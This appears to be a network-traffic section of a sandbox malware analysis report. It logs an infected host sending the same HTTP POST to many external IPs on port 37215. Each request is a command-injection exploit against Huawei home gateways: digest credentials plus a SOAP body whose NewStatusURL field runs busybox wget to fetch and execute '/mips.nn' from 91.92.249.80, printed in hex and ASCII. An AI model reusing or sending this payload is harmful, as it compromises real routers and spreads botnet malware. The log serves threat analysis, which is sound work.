                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2347192.168.2.234134441.217.225.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680191040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2348192.168.2.2357948168.239.70.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680201054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2349192.168.2.235917641.108.60.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680263996 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2350192.168.2.2359010197.213.191.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680284977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2351192.168.2.235079683.234.135.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680293083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2352192.168.2.234869441.10.79.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680315018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2353192.168.2.2342054218.68.236.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680329084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2354192.168.2.2360116157.142.122.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680330992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2355192.168.2.2360912197.155.53.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680357933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2356192.168.2.235319241.233.171.25037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680367947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2357192.168.2.2355454157.39.254.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680367947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
